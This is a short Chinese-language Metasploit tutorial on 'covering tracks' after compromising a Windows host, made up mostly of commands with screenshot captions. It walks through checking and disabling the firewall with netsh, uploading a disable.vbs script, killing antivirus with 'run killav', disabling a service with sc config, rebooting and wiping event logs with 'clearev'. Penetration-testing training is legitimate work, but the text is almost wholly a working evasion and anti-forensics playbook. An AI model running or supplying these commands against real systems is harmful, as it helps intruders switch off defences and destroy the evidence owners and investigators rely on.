清除痕迹


下一个阶段是借助日志删除清除痕迹,以及禁用防火墙和防护系统以保持隐蔽状态。


打开meterpreter连接会话


查看防火墙状态


run getcountermeasure


Metasploit训练基础-清除痕迹_清除痕迹


或者打开shell


netsh firewall show opmode


Metasploit训练基础-清除痕迹_清除痕迹_02


Metasploit训练基础-清除痕迹_安全入门_03


改用


netsh advfirewall firewall


关闭防火墙


netsh firewall set opmode mode=disable


Metasploit训练基础-清除痕迹_清除痕迹_04


Metasploit训练基础-清除痕迹_安全入门_05


上传脚本文件,关闭防火墙


upload <源文件位置> <目标文件位置>


upload /root/desktop/disable.vbs c:\


Metasploit训练基础-清除痕迹_安全入门_06


Metasploit训练基础-清除痕迹_安全入门_07


关掉杀毒软件


run killav


Metasploit训练基础-清除痕迹_清除痕迹_08


tasklist


Metasploit训练基础-清除痕迹_清除痕迹_09


筛选服务


tasklist /svc | find /I "svchost"


Metasploit训练基础-清除痕迹_安全入门_10


查看服务的属性


sc queryex WpnUserService_ac9f1


Metasploit训练基础-清除痕迹_安全入门_11


禁用服务进程


sc config WpnUserService_ac9f1 start=disabled


Metasploit训练基础-清除痕迹_清除痕迹_12

参数说明


Metasploit训练基础-清除痕迹_安全入门_13


reboot


重启系统


清除日志事件


clearev


Metasploit训练基础-清除痕迹_清除痕迹_14


Metasploit训练基础-清除痕迹_清除痕迹_15


Metasploit训练基础-清除痕迹_清除痕迹_16


新的模块,新的系统已经在更新,请了解新的信息。